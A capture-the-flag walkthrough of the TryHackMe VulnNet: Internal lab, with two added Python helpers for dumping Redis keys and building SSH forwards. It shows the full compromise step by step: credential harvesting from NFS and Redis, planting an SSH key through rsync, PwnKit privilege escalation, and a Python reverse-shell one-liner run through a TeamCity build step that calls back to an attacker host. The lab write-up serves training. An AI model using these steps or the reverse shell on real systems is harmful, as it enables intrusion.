VulnNet: Internal (SMB, NFS, Redis, Port Forwarding)
First, enumerate the target with nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ nmap -A 10.10.207.6 | tee nmap.log 130 ↵
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 20:57 +0630
Nmap scan report for 10.10.207.6
Host is up (0.24s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35721/tcp6 mountd
| 100005 1,2,3 45401/tcp mountd
| 100005 1,2,3 59949/udp6 mountd
| 100005 1,2,3 60579/udp mountd
| 100021 1,3,4 34197/tcp nlockmgr
| 100021 1,3,4 35019/tcp6 nlockmgr
| 100021 1,3,4 37326/udp nlockmgr
| 100021 1,3,4 38819/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -41m02s, deviation: 1h09m16s, median: -1m03s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2022-04-24T16:27:04+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-24T14:27:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.78 seconds
A full-port scan with rustscan adds Redis on 6379 and the high RPC ports, which the default nmap scan (top 1000 ports) did not list:
22/tcp open ssh syn-ack
111/tcp open rpcbind syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
873/tcp open rsync syn-ack
2049/tcp open nfs syn-ack
6379/tcp open redis syn-ack
34197/tcp open unknown syn-ack
45401/tcp open unknown syn-ack
60411/tcp open unknown syn-ack
60551/tcp open unknown syn-ack
Port 139,445
SMB accepts a guest (null) session and exposes an interesting share. List the shares with smbclient and press Enter at the password prompt:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ smbclient -L 10.10.207.6
Enter WORKGROUP\hnl's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Connect to the shares share anonymously, turn on recursion, disable the per-file prompt and pull everything:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ smbclient '\\10.10.207.6\shares' 130 ↵
Enter WORKGROUP\hnl's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Feb 2 15:50:09 2021
.. D 0 Tue Feb 2 15:58:11 2021
temp D 0 Sat Feb 6 18:15:10 2021
data D 0 Tue Feb 2 15:57:33 2021
11309648 blocks of size 1024. 3278676 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \temp\services.txt of size 38 as temp/services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \data\data.txt of size 48 as data/data.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \data\business-req.txt of size 190 as data/business-req.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>
The first flag is in temp/services.txt:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ cat temp/services.txt
THM{0a09d51e488f5fa105d8d866a497440a}
The two files in data are not useful for the attack, but are shown for completeness:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal/data
╰─➤ cat business-req.txt
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal/data
╰─➤ cat data.txt
Purge regularly data that is not needed anymore
Port 2049
NFS exports a directory to every client (the * in the showmount output means no client restriction at all):
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ showmount -e 10.10.207.6
Export list for 10.10.207.6:
/opt/conf *
Mount it locally:
╭─hnl@hnl /mnt/nfs-share/wildmidi
╰─➤ sudo mount -t nfs 10.10.207.6:/opt/conf /mnt/nfs-share
Most of the export is uninteresting, but redis/redis.conf inside it holds the Redis password in its requirepass line. A configuration directory that any host can mount is a finding on its own, independent of what it contains.

Port 6379
Authenticate with redis-cli using that password. Passing it with -a puts it in shell history and the process list, which is what the warning below is about; on a real engagement use the AUTH command inside the client or the REDISCLI_AUTH environment variable instead.
╭─hnl@hnl /mnt/nfs-share
╰─➤ redis-cli -h 10.10.207.6 -a 'B65Hx562F@ggAZ@F'
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.207.6:6379>
HackTricks has a useful Redis enumeration reference: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis. List the keys and read the flag:
10.10.207.6:6379> KEYS *
1) "int"
2) "marketlist"
3) "tmp"
4) "internal flag"
5) "authlist"
10.10.207.6:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
Dump the remaining keys. Run TYPE <key> first so you know which read command applies (GET on a list or hash fails with WRONGTYPE). Note that LRANGE indexes from 0, so the read below starts at the second element; LRANGE <key> 0 -1 returns the whole list.
10.10.85.164:6379> LRANGE marketlist 1 16
1) "Penetration Testing"
2) "Programming"
3) "Data Analysis"
4) "Analytics"
5) "Marketing"
6) "Media Streaming"
10.10.207.6:6379> LRANGE authlist 0 50
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
4) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNz
The entries are identical base64 strings; decode one:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ echo 'QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==' | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
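The two Redis steps above (typed reads of every key, then decoding the base64 blobs for credentials) as one script. This is an added example, not code from the original write-up. FakeRedis is a constructed in-memory stand-in with the same method names as a redis-py client created with decode_responses=True, so the script runs offline; against a live target you would replace it with redis.Redis(host=..., password=..., decode_responses=True). The sample values are the ones the write-up shows, plus a made-up hash key to exercise HGETALL.

```python
"""Typed Redis key dump plus base64 credential extraction (added example)."""
import base64
import re
from typing import Any, Dict, List, Optional, Tuple


class FakeRedis:
    """Constructed stand-in for redis.Redis(..., decode_responses=True)."""

    def __init__(self, data: Dict[str, Any]) -> None:
        self._d = data

    def keys(self, pattern: str = "*") -> List[str]:
        return list(self._d)

    def type(self, key: str) -> str:
        return {str: "string", list: "list", set: "set", dict: "hash"}[type(self._d[key])]

    def get(self, key: str) -> str:
        return self._d[key]

    def lrange(self, key: str, start: int, stop: int) -> List[str]:
        lst = self._d[key]
        return lst[start:] if stop == -1 else lst[start:stop + 1]

    def smembers(self, key: str) -> set:
        return set(self._d[key])

    def hgetall(self, key: str) -> Dict[str, str]:
        return dict(self._d[key])


# Constructed sample: keys seen on the box, values copied from the write-up
# where it shows them, and a made-up hash ("tmp") so the hash path is exercised.
AUTH_BLOB = ("QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRo"
             "IHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==")
SAMPLE = {
    "internal flag": "THM{ff8e518addbbddb74531a724236a8221}",
    "marketlist": ["Penetration Testing", "Programming", "Data Analysis",
                   "Analytics", "Marketing", "Media Streaming"],
    "authlist": [AUTH_BLOB, AUTH_BLOB, AUTH_BLOB],
    "tmp": {"note": "constructed hash value"},
}


def dump_all(r) -> Dict[str, Any]:
    """Read every key with the command its type requires. GET on a list or hash
    returns WRONGTYPE, and LRANGE indexes from 0, so 0..-1 is the whole list."""
    out: Dict[str, Any] = {}
    for key in r.keys("*"):
        t = r.type(key)
        if t == "string":
            out[key] = r.get(key)
        elif t == "list":
            out[key] = r.lrange(key, 0, -1)
        elif t == "set":
            out[key] = sorted(r.smembers(key))
        elif t == "hash":
            out[key] = r.hgetall(key)
        else:  # zset, stream: flag it rather than silently skipping
            out[key] = "<unhandled type %s>" % t
    return out


B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
RSYNC_RE = re.compile(r"rsync://([^@\s]+)@(\S+) with password (\S+)")


def maybe_b64(s: str) -> Optional[str]:
    """Decoded text if s is well-formed base64 that decodes to UTF-8, else None."""
    s = s.strip()
    if not B64_RE.match(s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def _strings(val: Any) -> List[str]:
    if isinstance(val, str):
        return [val]
    if isinstance(val, dict):
        return list(val.values())
    return list(val)


def find_rsync_creds(dump: Dict[str, Any]) -> List[Tuple[str, str, str]]:
    """Decode base64 values where possible and extract (user, host, password)
    from the 'rsync://user@host with password X' message format; duplicates collapse."""
    found = set()
    for val in dump.values():
        for s in _strings(val):
            text = maybe_b64(s) or s
            for m in RSYNC_RE.finditer(text):
                found.add(m.groups())
    return sorted(found)


if __name__ == "__main__":
    d = dump_all(FakeRedis(SAMPLE))
    for k, v in d.items():
        print(k, "->", "%d item(s)" % len(v) if isinstance(v, list) else v)
    print("rsync credentials:", find_rsync_creds(d))
```

The type dispatch is the part worth keeping: KEYS * followed by blind GETs is the usual mistake, and it silently misses the lists and hashes where this box kept its credentials.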
Port 873
HackTricks has a useful rsync reference: https://book.hacktricks.xyz/pentesting/873-pentesting-rsync. Confirm the module name with the nmap NSE script:
╭─hnl@hnl /mnt/nfs-share/redis
╰─➤ nmap -sV --script "rsync-list-modules" -p873 10.10.207.6
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 23:07 +0630
Nmap scan report for 10.10.207.6
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
| rsync-list-modules:
|_ files Necessary home interaction
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
List the module with the recovered credentials. It maps onto the sys-internal user's home directory:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ rsync -av --list-only rsync://rsync-connect@10.10.207.6/files 5 ↵
Password:
receiving incremental file list
drwxr-xr-x 4,096 2021/02/01 19:21:14 .
drwxr-xr-x 4,096 2021/02/06 19:19:29 sys-internal
-rw------- 61 2021/02/06 19:19:28 sys-internal/.Xauthority
lrwxrwxrwx 9 2021/02/01 20:03:19 sys-internal/.bash_history -> /dev/null
-rw-r--r-- 220 2021/02/01 19:21:14 sys-internal/.bash_logout
-rw-r--r-- 3,771 2021/02/01 19:21:14 sys-internal/.bashrc
-rw-r--r-- 26 2021/02/01 19:23:18 sys-internal/.dmrc
-rw-r--r-- 807 2021/02/01 19:21:14 sys-internal/.profile
Pull the whole module down to a local directory:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ rsync -av rsync://rsync-connect@10.10.207.6/files ./rsync-files
Generate an SSH key pair locally, write the public key into a file named authorized_keys, and push it into sys-internal/.ssh/ over rsync. The module is writable, which is the real weakness here: anyone holding the rsync credentials can plant a key in the user's home directory. Keep the local authorized_keys at mode 600 before uploading, because -a preserves permissions and sshd (with the default StrictModes) rejects a group- or world-writable file.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ rsync -av ./authorized_keys rsync://rsync-connect@10.10.207.6/files/sys-internal/.ssh/
Password:
sending incremental file list
authorized_keys
sent 672 bytes received 35 bytes 157.11 bytes/sec
total size is 561 speedup is 0.79
Finally, SSH in with the matching private key:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ ssh -i id_rsa sys-internal@10.10.207.6
The authenticity of host '10.10.207.6 (10.10.207.6)' can't be established.
ECDSA key fingerprint is SHA256:0ysriVjo72WRJI6UecJ9s8z6QHPNngSiMUKWFTO6Vr4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.207.6' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
541 packages can be updated.
342 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
sys-internal@vulnnet-internal:~$
User
The user flag is in the home directory:
sys-internal@vulnnet-internal:~$ cat user.txt
THM{da7c20696831f253e0afaca8b83c07ab}
Download linpeas from your own host and enumerate the system. It is vulnerable to PwnKit (CVE-2021-4034, the SUID pkexec local privilege escalation). PoC: https://github.com/arthepsy/CVE-2021-4034. PwnKit was published in January 2022, after this room was built, so it is an unintended shortcut; the intended route is through TeamCity further down. chmod +x is enough here; 777 is not needed.
sys-internal@vulnnet-internal:~/Desktop$ wget http://10.9.0.63:1234/linpeas
sys-internal@vulnnet-internal:~/Desktop$ chmod 777 linpeas
sys-internal@vulnnet-internal:~/Desktop$ ./linpeas
Root
Compile the PoC's C source (copied to the box as exploit.c) and run it; pkexec's SUID bit does the rest:
sys-internal@vulnnet-internal:~/Desktop$ gcc exploit.c -o exploit
sys-internal@vulnnet-internal:~/Desktop$ chmod 777 exploit
sys-internal@vulnnet-internal:~/Desktop$ ./exploit
# whoami
root
# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
#
The Truth (Root)
The intended route. ss reveals a connection to port 8111 on loopback, a service that nmap could not see from outside. Note that ss -t alone lists only connected sockets, so it showed this one by luck; ss -tlnp lists listening sockets with their owning process and is the command to run first when hunting for pivot targets.
sys-internal@vulnnet-internal:~$ ss -t
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 72 10.10.207.6:ssh 10.9.0.63:33534
CLOSE-WAIT 1 0 [::ffff:127.0.0.1]:34921 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:32799 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:32799
Forward local port 8080 through the SSH session to 127.0.0.1:8111 on the target:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal
╰─➤ ssh -i id_rsa sys-internal@10.10.207.6 -L 8080:127.0.0.1:8111
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
Browsing to http://127.0.0.1:8080 shows a TeamCity login page that asks for an authentication token (the super user login).
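The two steps above (find loopback-only listeners with ss, then forward them over SSH) as a small helper. This is an added example, not part of the original write-up. SAMPLE_SS is constructed text in the shape of ss -tlnp output: the process names and every port except 8111 are made up, and the host, user and key path passed to forward_command are the ones from this write-up.

```python
"""Pick loopback-only listeners out of `ss -tlnp` output and build the matching
SSH local-forward command (added example)."""
import ipaddress
import re
from typing import List, Tuple

# Constructed sample in the shape of `ss -tlnp`; only port 8111 comes from the box.
SAMPLE_SS = """\
State   Recv-Q  Send-Q   Local Address:Port        Peer Address:Port  Process
LISTEN  0       128      0.0.0.0:22                0.0.0.0:*          users:(("sshd",pid=900,fd=3))
LISTEN  0       128      127.0.0.1:631             0.0.0.0:*          users:(("cupsd",pid=910,fd=7))
LISTEN  0       128      *:873                     *:*                users:(("rsync",pid=920,fd=4))
LISTEN  0       100      [::ffff:127.0.0.1]:8111   *:*                users:(("java",pid=1337,fd=45))
LISTEN  0       128      127.0.0.1:8111            0.0.0.0:*          users:(("java",pid=1337,fd=46))
LISTEN  0       128      [::]:2049                 [::]:*
"""

PROC_RE = re.compile(r'\("([^"]+)"')


def _split_local(field: str) -> Tuple[str, int]:
    """'[::ffff:127.0.0.1]:8111' -> ('127.0.0.1', 8111); '*:873' -> ('*', 873)."""
    addr, port = field.rsplit(":", 1)
    addr = addr.strip("[]")
    if addr.startswith("::ffff:"):  # IPv4-mapped IPv6, as ss prints for v6 sockets
        addr = addr[len("::ffff:"):]
    return addr, int(port)


def _is_loopback(addr: str) -> bool:
    if addr in ("*", ""):
        return False
    return ipaddress.ip_address(addr).is_loopback


def loopback_listeners(ss_output: str) -> List[Tuple[str, int, str]]:
    """Return (address, port, process) for LISTEN sockets bound only to loopback,
    one entry per port, sorted by port. `ss -t` without -l shows connected
    sockets only and would miss an idle listener entirely."""
    seen = {}
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue
        addr, port = _split_local(parts[3])
        if not _is_loopback(addr):
            continue
        m = PROC_RE.search(line)
        seen.setdefault(port, (addr, port, m.group(1) if m else ""))
    return [seen[p] for p in sorted(seen)]


def forward_command(listeners, user: str, host: str, key: str, first_local: int = 8080) -> str:
    """One ssh invocation with a -L forward per loopback service, local ports
    allocated consecutively from first_local. -N opens no remote shell."""
    flags = " ".join(
        "-L %d:127.0.0.1:%d" % (first_local + i, port)
        for i, (_, port, _) in enumerate(listeners)
    )
    return "ssh -i %s -N %s %s@%s" % (key, flags, user, host)


if __name__ == "__main__":
    found = loopback_listeners(SAMPLE_SS)
    for addr, port, proc in found:
        print("%s:%d (%s)" % (addr, port, proc or "unknown"))
    print(forward_command(found, "sys-internal", "10.10.207.6", "id_rsa"))
```

Feed it real output with ss -tlnp > ss.txt on the target and loopback_listeners(open("ss.txt").read()) locally; the IPv4-mapped form handles the [::ffff:127.0.0.1] entries that a naive 127.0.0.1 grep misses.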

There is a TeamCity directory in /:
sys-internal@vulnnet-internal:~$ ls -al /
total 533824
drwxr-xr-x 24 root root 4096 Feb 6 2021 .
drwxr-xr-x 24 root root 4096 Feb 6 2021 ..
drwxr-xr-x 2 root root 4096 Feb 2 2021 bin
drwxr-xr-x 3 root root 4096 Feb 1 2021 boot
drwx------ 2 root root 4096 Feb 1 2021 .cache
drwxr-xr-x 17 root root 3720 Apr 25 03:42 dev
drwxr-xr-x 129 root root 12288 Feb 7 2021 etc
drwxr-xr-x 3 root root 4096 Feb 1 2021 home
lrwxrwxrwx 1 root root 34 Feb 1 2021 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx 1 root root 33 Feb 1 2021 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x 18 root root 4096 Feb 1 2021 lib
drwxr-xr-x 2 root root 4096 Feb 1 2021 lib64
drwx------ 2 root root 16384 Feb 1 2021 lost+found
drwxr-xr-x 4 root root 4096 Feb 2 2021 media
drwxr-xr-x 2 root root 4096 Feb 1 2021 mnt
drwxr-xr-x 4 root root 4096 Feb 2 2021 opt
dr-xr-xr-x 139 root root 0 Apr 25 03:42 proc
drwx------ 8 root root 4096 Feb 6 2021 root
drwxr-xr-x 27 root root 880 Apr 25 08:37 run
drwxr-xr-x 2 root root 4096 Feb 2 2021 sbin
drwxr-xr-x 2 root root 4096 Feb 1 2021 srv
-rw------- 1 root root 546529280 Feb 1 2021 swapfile
dr-xr-xr-x 13 root root 0 Apr 25 03:42 sys
drwxr-xr-x 12 root root 4096 Feb 6 2021 TeamCity
drwxrwxrwt 11 root root 4096 Apr 25 08:41 tmp
drwxr-xr-x 10 root root 4096 Feb 1 2021 usr
drwxr-xr-x 13 root root 4096 Feb 1 2021 var
lrwxrwxrwx 1 root root 31 Feb 1 2021 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx 1 root root 30 Feb 1 2021 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic
Search it for the token. TeamCity writes the super user token to logs/catalina.out and generates a new one at every server start, so the most recent entry is the valid one:
sys-internal@vulnnet-internal:/TeamCity$ grep -R token
logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 4319495926070655877 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 4319495926070655877 (use empty username with the token as the password to access the server)
Log in with an empty username and the token as the password; you land on the dashboard.

Create a project with a command-line build step that runs Python with the one-liner below. Build steps execute with the privileges of the TeamCity agent process, which is how this path gives root on this box:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.63",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
A netcat listener on 10.9.0.63:9002 receives the shell when the build runs.
